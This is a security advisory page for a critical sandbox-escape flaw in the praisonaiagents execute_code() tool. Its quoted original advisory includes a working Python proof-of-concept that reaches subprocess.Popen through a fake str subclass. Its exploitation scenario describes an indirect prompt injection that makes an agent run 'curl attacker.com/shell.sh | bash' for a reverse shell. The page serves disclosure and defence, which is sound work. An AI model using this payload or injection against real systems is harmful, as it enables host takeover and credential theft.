CVE-2026-34938: praisonaiagents: sandbox bypass enables full host RCE

GHSA-6vh2-h83c-9294 CRITICAL CISA: ATTEND
Published April 1, 2026
CISO Take

Patch praisonaiagents to 1.5.90 immediately — this is a CVSS 10 sandbox escape that delivers unauthenticated OS command execution with no user interaction required. Any deployment using execute_code() is fully compromised, and the default PRAISONAI_AUTO_APPROVE=true in bot/autonomy modes means indirect prompt injection silently triggers RCE without human confirmation. Until patched, disable or sandbox any agent pipeline that invokes execute_code().

What is the risk?

Maximum exploitability: CVSS 10 with network vector, zero privileges, no user interaction, and scope change (C:H/I:H/A:H). The public PoC lowers exploitation bar to script-kiddie level post-disclosure. PraisonAI is a widely-used multi-agent orchestration framework in enterprise AI pipelines; exposure is broad. Auto-approval defaults dramatically amplify blast radius — a single indirect prompt injection in a document, email, or web result processed by the agent is sufficient to achieve code execution with no human in the loop.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
PraisonAI Agents pip <= 1.5.89 1.5.90
11 dependents 69% patched ~0d to patch Full package profile →

Do you use PraisonAI Agents? You're affected.

How severe is it?

CVSS 3.1
10.0 / 10
EPSS
0.7%
chance of exploitation in 30 days
Higher than 49% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Changed
C High
I High
A High

What should I do?

6 steps
  1. PATCH NOW

    Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents).

  2. DISABLE AUTO-APPROVE: Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments.

  3. ISOLATE

    Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem.

  4. LEAST PRIVILEGE

    Ensure the process user running the agent has minimal OS permissions.

  5. DETECT

    Log and alert on any invocation of execute_code() — look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads.

  6. AUDIT

    Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.1.4 - Risk assessment for AI system A.6.2.6 - AI system security
NIST AI RMF
MANAGE-2.2 - Mechanisms exist to sustain deployment of AI with appropriate oversight MAP-5.1 - Likelihood and magnitude of each AI risk driver is examined
OWASP LLM Top 10
LLM02 - Insecure Output Handling LLM07 - Insecure Plugin Design LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-34938?

Patch praisonaiagents to 1.5.90 immediately — this is a CVSS 10 sandbox escape that delivers unauthenticated OS command execution with no user interaction required. Any deployment using execute_code() is fully compromised, and the default PRAISONAI_AUTO_APPROVE=true in bot/autonomy modes means indirect prompt injection silently triggers RCE without human confirmation. Until patched, disable or sandbox any agent pipeline that invokes execute_code().

Is CVE-2026-34938 actively exploited?

No confirmed active exploitation of CVE-2026-34938 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-34938?

1. PATCH NOW: Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents). 2. DISABLE AUTO-APPROVE: Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments. 3. ISOLATE: Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem. 4. LEAST PRIVILEGE: Ensure the process user running the agent has minimal OS permissions. 5. DETECT: Log and alert on any invocation of execute_code() — look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads. 6. AUDIT: Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.

What systems are affected by CVE-2026-34938?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, agentic pipelines with code execution tools, RAG pipelines with autonomous agents, multi-agent orchestration systems, AI-powered automation bots.

What is the CVSS score for CVE-2026-34938?

CVE-2026-34938 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 0.71%.

What is the AI security impact?

Affected AI Architectures

agent frameworksagentic pipelines with code execution toolsRAG pipelines with autonomous agentsmulti-agent orchestration systemsAI-powered automation bots

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0051.001 Indirect
AML.T0053 AI Agent Tool Invocation
AML.T0072 Reverse Shell
AML.T0105 Escape to Host

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.1.4, A.6.2.6
NIST AI RMF: MANAGE-2.2, MAP-5.1
OWASP LLM Top 10: LLM02, LLM07, LLM08

What are the technical details?

Original Advisory

### Summary `execute_code()` in `praisonai-agents` runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a `str` subclass with an overridden `startswith()` method to the `_safe_getattr` wrapper, achieving arbitrary OS command execution on the host. ### Details `python_tools.py:20` (source) -> `python_tools.py:22` (guard bypass) -> `python_tools.py:161` (sink) ```python # source -- _safe_getattr accepts any str subclass def _safe_getattr(obj, name, *default): if isinstance(name, str) and name.startswith('_'): # isinstance passes for subclasses raise AttributeError(...) # hop -- type() is whitelisted in safe_builtins, creates str subclass without class keyword FakeStr = type('FakeStr', (str,), {'startswith': lambda self, *a: False}) # sink -- Popen reached via __subclasses__ walk r = Popen(['id'], stdout=PIPE, stderr=PIPE) ``` ### PoC ```python from praisonaiagents.tools.python_tools import execute_code payload = """ t = type FakeStr = t('FakeStr', (str,), {'startswith': lambda self, *a: False}) mro_attr = FakeStr(''.join(['_','_','m','r','o','_','_'])) subs_attr = FakeStr(''.join(['_','_','s','u','b','c','l','a','s','s','e','s','_','_'])) mod_attr = FakeStr(''.join(['_','_','m','o','d','u','l','e','_','_'])) name_attr = FakeStr(''.join(['_','_','n','a','m','e','_','_'])) PIPE = -1 obj_class = getattr(type(()), mro_attr)[1] for cls in getattr(obj_class, subs_attr)(): try: m = getattr(cls, mod_attr, '') n = getattr(cls, name_attr, '') if m == 'subprocess' and n == 'Popen': r = cls(['id'], stdout=PIPE, stderr=PIPE) out, err = r.communicate() print('RCE:', out.decode()) break except Exception as e: print('ERR:', e) """ result = execute_code(code=payload) print(result) # expected output: RCE: uid=1000(narey) gid=1000(narey) groups=1000(narey)... ``` ### Impact Any user or agent pipeline running `execute_code()` is exposed to full OS command execution as the process user. Deployments using `bot.py`, `autonomy_mode.py`, or `bots_cli.py` set `PRAISONAI_AUTO_APPROVE=true` by default, meaning no human confirmation is required and the tool fires silently when triggered via indirect prompt injection.

Exploitation Scenario

An attacker embeds a malicious prompt in a publicly accessible document or web page that an autonomous PraisonAI agent crawls as part of its workflow (indirect prompt injection). The injected prompt instructs the agent to call execute_code() with the PoC payload. Because PRAISONAI_AUTO_APPROVE=true is default in autonomy_mode.py, the agent executes the payload silently — no human confirmation dialog appears. The payload walks Python's __subclasses__ chain to reach subprocess.Popen, executes 'curl attacker.com/shell.sh | bash', and establishes a reverse shell. From there, the attacker pivots to any credentials, APIs, or data sources accessible to the agent process.

Weaknesses (CWE)

CWE-693 — Protection Mechanism Failure: The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Timeline

Published
April 1, 2026
Last Modified
April 1, 2026
First Seen
April 2, 2026

Related Vulnerabilities